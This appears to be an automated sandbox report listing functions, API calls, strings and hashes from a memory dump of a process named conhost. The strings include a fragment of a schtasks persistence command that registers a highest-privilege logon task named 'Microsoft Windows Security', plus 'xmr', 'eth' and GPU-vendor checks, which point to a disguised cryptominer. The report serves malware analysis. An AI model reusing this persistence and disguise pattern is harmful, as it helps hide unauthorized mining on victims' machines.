\??\, xrefs: 00007FF6CE1F1A9F
0, xrefs: 00007FF6CE1F1963
%S /run /tn "Microsoft Windows Security", xrefs: 00007FF6CE1F1724
%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest , xrefs: 00007FF6CE1F1726

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: memsetwcsncmp
String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
API String ID: 1181335886-2264807111
Opcode ID: 9340c56cd80f63489d28db57b46e1f31c9ba72a2ab9b3280ce8ad71af1fbfc60
Instruction ID: f2340201c8ceb440e251207883197702dc7769a596b79530da4b72f65fa67a4b
Opcode Fuzzy Hash: 9340c56cd80f63489d28db57b46e1f31c9ba72a2ab9b3280ce8ad71af1fbfc60
Instruction Fuzzy Hash: AF027C72A18BC185E3218F25E8013AA77B1FBA57A5F004335EAECA7AD5DF3DD5848740

Function 00007FF6CE1F2990 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6CE1F29BE

Part of subcall function 00007FF6CE1F1720: wcsncmp.MSVCRT ref: 00007FF6CE1F191D

Strings

\BaseNamedObjects\vljmdnomkxppwbqz, xrefs: 00007FF6CE1F2997
eth, xrefs: 00007FF6CE1F2999

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: memsetwcsncmp
String ID: \BaseNamedObjects\vljmdnomkxppwbqz$eth
API String ID: 1181335886-3208800472
Opcode ID: 0b5ccc7bbee36a88c8147fb3cb6218f60deec08863c1a95231d2b2b3d10a26d2
Instruction ID: 3f5da42ef06ee8e5a3cc9bf97dbfda5961bbd8e4be07bd8d9cb0037af645ebc6
Opcode Fuzzy Hash: 0b5ccc7bbee36a88c8147fb3cb6218f60deec08863c1a95231d2b2b3d10a26d2
Instruction Fuzzy Hash: D901E522B0C68141E220EA16A8007EA6671AF95BE1F544231FECC63FD5CE7CD546CB44

Function 00007FF6CE1F2A50 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6CE1F2A7C

Strings

0, xrefs: 00007FF6CE1F2AA8
eth, xrefs: 00007FF6CE1F2A50

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: wcslen
String ID: 0$eth
API String ID: 4088430540-242559905
Opcode ID: 3574754aed9c12ba8bdea8b4331650656b37aea54c0df955361aacc6e335debb
Instruction ID: 1bb6bbe75a2d682b68bfcfcad866e29f9555d27e242d84b5ea1265c29f71aece
Opcode Fuzzy Hash: 3574754aed9c12ba8bdea8b4331650656b37aea54c0df955361aacc6e335debb
Instruction Fuzzy Hash: 7A01C02261868082E7109B51F85479BA770EF84768F640325FA9856ED5EF3EC5958B40

Non-executed Functions

Function 00007FF6CE1F1EA0 Relevance: 37.2, APIs: 9, Strings: 12, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF6CE1F1F2B
wcslen.MSVCRT ref: 00007FF6CE1F2090
memcpy.MSVCRT ref: 00007FF6CE1F20AF
memcpy.MSVCRT ref: 00007FF6CE1F20D0
wcslen.MSVCRT ref: 00007FF6CE1F2343

Strings

ProviderName, xrefs: 00007FF6CE1F233C
0, xrefs: 00007FF6CE1F255C
APPDATA=, xrefs: 00007FF6CE1F1EA6
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 00007FF6CE1F1EE9
ATI, xrefs: 00007FF6CE1F2792
@, xrefs: 00007FF6CE1F2489
NVIDIA, xrefs: 00007FF6CE1F2686
ProviderName, xrefs: 00007FF6CE1F2437
$0', xrefs: 00007FF6CE1F26AC
Advanced Micro Devices, xrefs: 00007FF6CE1F28FC
AMD, xrefs: 00007FF6CE1F270C
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 00007FF6CE1F20A1

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: memcpy$wcslen
String ID: $0'$0$@$AMD$APPDATA=$ATI$Advanced Micro Devices$NVIDIA$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
API String ID: 1844840824-1300809496
Opcode ID: 5b5f1375f3de931362796e278fad743eef0130830d29893e114e696d61781ae2
Instruction ID: 48757376f480a0a6078c24429338a70b303ee81cd7f0f854a0f5b2d110b692ec
Opcode Fuzzy Hash: 5b5f1375f3de931362796e278fad743eef0130830d29893e114e696d61781ae2
Instruction Fuzzy Hash: 77527F65D2CAC294F7129F69E9513B47371BFA1382F054231E9C9B26A1EF2EE7458304

Function 00007FF6CE1FEE40 Relevance: 31.7, APIs: 21, Instructions: 232
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF6CE1FEE5B
memcpy.MSVCRT ref: 00007FF6CE1FEE7B
malloc.MSVCRT ref: 00007FF6CE1FEE95
memset.MSVCRT ref: 00007FF6CE1FEEBF
abort.MSVCRT ref: 00007FF6CE1FEED2
CreateSemaphoreW.KERNEL32 ref: 00007FF6CE1FEEFB
TlsAlloc.KERNEL32 ref: 00007FF6CE1FEF08
GetLastError.KERNEL32 ref: 00007FF6CE1FEF30
abort.MSVCRT ref: 00007FF6CE1FEF38

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
String ID:
API String ID: 342303811-0
Opcode ID: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
Instruction ID: 92d89f514d18e3f9453b3ac4ab0ff8bd67b4553537444f5125d17122a4bf4b85
Opcode Fuzzy Hash: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
Instruction Fuzzy Hash: 5391CF32E0964281EA249F65E91077933B2AF68F96F548135F98DA3B90DF3DE951C380

Function 00007FF6CE2076F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 102
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00007FF6CE2077EC

Part of subcall function 00007FF6CE1FD100: strlen.MSVCRT ref: 00007FF6CE1FD185
Part of subcall function 00007FF6CE1FD100: memcpy.MSVCRT ref: 00007FF6CE1FD19E
Part of subcall function 00007FF6CE1FD100: free.MSVCRT ref: 00007FF6CE1FD1A9

fwrite.MSVCRT ref: 00007FF6CE207768
fputs.MSVCRT ref: 00007FF6CE207782
fwrite.MSVCRT ref: 00007FF6CE2077A3
free.MSVCRT ref: 00007FF6CE2077B3
fputs.MSVCRT ref: 00007FF6CE2077C5
abort.MSVCRT ref: 00007FF6CE2077F1
fwrite.MSVCRT ref: 00007FF6CE207816
abort.MSVCRT ref: 00007FF6CE20781B
fwrite.MSVCRT ref: 00007FF6CE207856
fputs.MSVCRT ref: 00007FF6CE207868
fputc.MSVCRT ref: 00007FF6CE20787C

Strings

terminate called without an active exception, xrefs: 00007FF6CE2077E2
terminate called recursively, xrefs: 00007FF6CE20780C
terminate called after throwing an instance of ', xrefs: 00007FF6CE20775E
what(): , xrefs: 00007FF6CE20784F

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 802779101-808685626
Opcode ID: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
Instruction ID: 5d6e22255d22a11c7ea9ef586956d97f41e0bddb2c35a1a8217a7c6551507247
Opcode Fuzzy Hash: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
Instruction Fuzzy Hash: C941C370B0919606FA14BF71AA35BB93A719FA5B82F400039F9CDE7BD2DD2CE5018311

Function 00007FF6CE1FE8F0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32 ref: 00007FF6CE1FE9BE
abort.MSVCRT(?,?,?,?,?,?,00000060,?,?,?,00000000,%S /run /tn "Microsoft Windows Security",00007FF6CE208575), ref: 00007FF6CE1FE9C4
RtlUnwindEx.KERNEL32 ref: 00007FF6CE1FEADD

Strings

CCG!, xrefs: 00007FF6CE1FE9B1
%S /run /tn "Microsoft Windows Security", xrefs: 00007FF6CE1FE8F0
CCG", xrefs: 00007FF6CE1FE929
CCG!, xrefs: 00007FF6CE1FE91A
CCG , xrefs: 00007FF6CE1FE957

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: %S /run /tn "Microsoft Windows Security"$CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-965913644
Opcode ID: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
Instruction ID: 5276c897c9baac8f656a5aaf7af20750943194ee674402790a76e761a43f9066
Opcode Fuzzy Hash: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
Instruction Fuzzy Hash: 2A51AD32A08A8182E7608F19E4447A97370FB99B99F505236FECE63B58DF3DD591C740

Function 00007FF6CE1FC2E0 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 346
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strncmp.MSVCRT ref: 00007FF6CE1FC324
strlen.MSVCRT ref: 00007FF6CE1FC42E

Strings

Z, xrefs: 00007FF6CE1FC4F8
_GLOBAL_, xrefs: 00007FF6CE1FC31D
_, xrefs: 00007FF6CE1FC6BC
_, xrefs: 00007FF6CE1FC379
_, xrefs: 00007FF6CE1FC4EB
Z, xrefs: 00007FF6CE1FC387

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: strlenstrncmp
String ID: Z$Z$_$_$_$_GLOBAL_
API String ID: 1310274236-662103887
Opcode ID: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
Instruction ID: b423c4d6ca8ed56bf2e7fa2945396b1fe814a9e7e9895efde33a2d8ac62f71b3
Opcode Fuzzy Hash: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
Instruction Fuzzy Hash: DFE1F472A086C289F7208F3194143FD3BB1BB15B9AF444131EA9CABB85DF3CD6569784

Function 00007FF6CE1FDB76 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

signal.MSVCRT ref: 00007FF6CE1FDBDD
signal.MSVCRT ref: 00007FF6CE1FDC29
signal.MSVCRT ref: 00007FF6CE1FDC42
signal.MSVCRT ref: 00007FF6CE1FDD4A

Strings

CCG , xrefs: 00007FF6CE1FDB95

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
Instruction ID: e692945289ce41b9fd8d9a8eca4b562ae91624dd73c7f885053cab1abb0c76f4
Opcode Fuzzy Hash: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
Instruction Fuzzy Hash: FB41A560E3C10305FB782D78446037811B15FE6B26F994A3DF5AEE7BD1CD9DB8A05292

Function 00007FF6CE1FD540 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF6CE1FD65B

Strings

Address %p has no image-section, xrefs: 00007FF6CE1FD5B5, 00007FF6CE1FD792
Mingw-w64 runtime failure:, xrefs: 00007FF6CE1FD577
VirtualProtect failed with code 0x%x, xrefs: 00007FF6CE1FD732
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF6CE1FD77C

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
Instruction ID: cc9999128567b90f842c6dfda047476f9347f41262ebb04d11694404993c07d0
Opcode Fuzzy Hash: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
Instruction Fuzzy Hash: CF613172B1868286EB108F51E9407B977B1BB64BA6F044134FECDA7B90EE3CE955C340

Function 00007FF6CE201640 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF6CE20178C

Strings

%-*.*S, xrefs: 00007FF6CE2017BE
%*.*S, xrefs: 00007FF6CE201785
%.*S, xrefs: 00007FF6CE2017AA

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: fwprintf
String ID: %*.*S$%-*.*S$%.*S
API String ID: 968622242-2115465065
Opcode ID: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
Instruction ID: 0a3d17bd7bd54759098a2b178c89266d720386771c46b15cb42dd68d83c6b191
Opcode Fuzzy Hash: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
Instruction Fuzzy Hash: 7441D573F1828286F7618E15D61077977B1ABA0BA6F188130FE8E976C5DF3CE4418B00

Function 00007FF6CE2018F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

%-*.*s, xrefs: 00007FF6CE201A51
%.*s, xrefs: 00007FF6CE201A3D
%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest , xrefs: 00007FF6CE2018F3
%*.*s, xrefs: 00007FF6CE201A1A

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest
API String ID: 0-2632607494
Opcode ID: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
Instruction ID: e74c7ad40d1b15703e4f9428ce0de3265cfceabeed56faf587062ee44c5bd2d6
Opcode Fuzzy Hash: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
Instruction Fuzzy Hash: 6C41D873A182CA85E7609F65C62077977B1FB60795F18C134FE8EAB6C5EE6CA440CB00

Function 00007FF6CE1F2BA0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6CE1F2BC4
wcscpy.MSVCRT ref: 00007FF6CE1F2C72
wcscat.MSVCRT ref: 00007FF6CE1F2C7D
wcslen.MSVCRT ref: 00007FF6CE1F2C8E

Strings

\??\, xrefs: 00007FF6CE1F2C68
eth, xrefs: 00007FF6CE1F2BA2

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: memsetwcscatwcscpywcslen
String ID: \??\$eth
API String ID: 468205783-1480138707
Opcode ID: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
Instruction ID: 8653e684fd687e59fac3ef0fae4965e74dd20b514ac885628b62f794023aeb51
Opcode Fuzzy Hash: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
Instruction Fuzzy Hash: 1C31CD61A1878284F7209F61EA113B53771BF65789F048235F9CCE7BA1EF2DE5858300

Function 00007FF6CE1FD7B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00007FF6CE214958,00007FF6CE214950,00007FF6CE213E20,00007FFEFE3AADA0,?,?,?,00000001,00007FF6CE1F124C), ref: 00007FF6CE1FD96D

Part of subcall function 00007FF6CE1FD5B0: VirtualQuery.KERNEL32 ref: 00007FF6CE1FD65B

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF6CE1FDAEA
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6CE1FDB03
Unknown pseudo relocation protocol version %d., xrefs: 00007FF6CE1FDB12

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 1027372294-1286557213
Opcode ID: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
Instruction ID: 299272ef180815057e217a4b79c6b9a7101de02b3f872e238b3a3dd905664858
Opcode Fuzzy Hash: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
Instruction Fuzzy Hash: 0691F022F28A4285FB208F2195007793771BF65BAAF544235ED9DA7BC4DE3DE451C780

Function 00007FF6CE1FD100 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON

Download Yara Rule

